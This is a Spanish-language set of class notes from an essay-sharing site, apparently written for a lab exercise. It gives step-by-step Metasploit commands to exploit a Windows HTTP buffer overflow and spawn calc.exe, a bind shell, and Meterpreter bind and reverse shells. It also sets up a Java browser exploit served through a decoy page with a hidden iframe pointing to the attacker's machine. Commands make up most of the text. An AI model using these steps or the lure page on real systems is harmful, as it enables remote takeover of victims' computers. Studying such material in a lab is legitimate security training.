ClubEnsayos.com - Ensayos de Calidad, Tareas y Monografias
Buscar

Prueba Para entar.... msfconsole


Enviado por   •  7 de Junio de 2017  •  Apuntes  •  841 Palabras (4 Páginas)  •  297 Visitas

Página 1 de 4

Para entar....

msfconsole

Para ver los comando...

help

--Ingresar al modulo

use exploit/windows/http/efes_fmws_userid_bof

---

info (nos da la informacion del modulo quw haigamos cargado)

---

show options

nos muestra las opciones basicas del modulo

--

set RHOST 192.168.0.32

maquina que se va analizar

--

set PAYLOAD windows/

existen cientos de posibildades de payload para windows

en este caso 128 posibilidades.

set PAYLOAD windows/exec

---

damos otra vez

show options

nos mostrara las opciones del modulo y por otro lado las opcioes de ld PAYLOAD

----

DONDE YA PODEMOS EJECUTAR CODIO REMOTO

set CMD calc.exe (enter)

exploit (enter) y se ejecuta la calculadora en la pc remota

---

nos cambiamos a

set PAYLOAD windows/shell_bind_tcp (enter)

show options (enter)

exploit (enter) Notaremos que nos aparece un CDM

whoami

en modulo shell_bing_tcp lo que hara es atarse al puerto 4444

(Capturar pantalla de windows de windows ejecutando netstat -rn)

--

Segunda clase de vulneravilidades: (CLIENT-SIDE)

Existe un modulo

use exploit/windows/http_/efs_userid_bof (enter)

show options (enter)

Siempre que apares en parametro RHOST significa que es una analisis directa

o instruccion directa

set RHOST 192.168.1.X (enter)

set PAYLOAD windows/meterpreter/reverse_tcp (enter)

(significa se lo hace dedes la KALI misma)

set LHOST 192.168.1.x (enter)

show options (enter)

--

Sin embargo en ves de reverso lo ponemos de tipo bind

set PAYLOAD windows/meterpreter/bind_tcp (enter)

show options (enter)

(sera in instruccion directa por en la maquina win estara el PAYLOAD ESPERNADONOS)

exploit (ENTER)

getuid (enter) nos mostara que estamos en la maquia de windows 7

exit (salimos)

---

VAMOS A EXPLOTAR JAVA

use exploit /multi/browser/java_jre17_jmxbean (enter)

(no es explotacion dierecta, nosotros recibiremso uan peticion

le devolveremos un exploit)

hay que tener creada uan pagina

<html>

<body>

esto no es facebook.com

<iframe src="http://192.168.1.15:8080/" height="0" width="0">

</body>

</html>

---

activamos apache---

/etc/init.d/apache2 start

ejecutamos http://192.168.1.18:8080/ ne windows 7

--

en el kali

show options

set URIPATH

show options

como esto es un expliot de java, multiplataforma

show targets ( mostramnos los targets)

set payload java/ (son payload JAVA para linux)

--Por default esta target 0 que es par linux

cambiamos a payload para windows

set TARGET 1 (enter)

--metenemos el PAYLOAD que querramos

set PAYLOAD windows/meterpreter/reserve_tcp (enter)

set LHOST 192.168.1.15 (ENTER)

exploit (enter)

no pasara nada hasta que lancemos la pagina desde windows

y comenzara la peticion

y des kali ya tendriamos acceso, pero fue por el usuario uso la pagina

y podmos ver la session

sessions (enter)

getuid (enter)

sysinfo (enter)

----------------------------------------------------------------------------

OTRO EJEMPLO DE CLIENT SIDE pero esto es con Firefox mozilla

http://www.seguridadapple.com/2015/03/poc-proxy-prototype-privileged.html

-------------------------------------------------------------------------

...

Descargar como (para miembros actualizados) txt (6 Kb) pdf (53 Kb) docx (17 Kb)
Leer 3 páginas más »
Disponible sólo en Clubensayos.com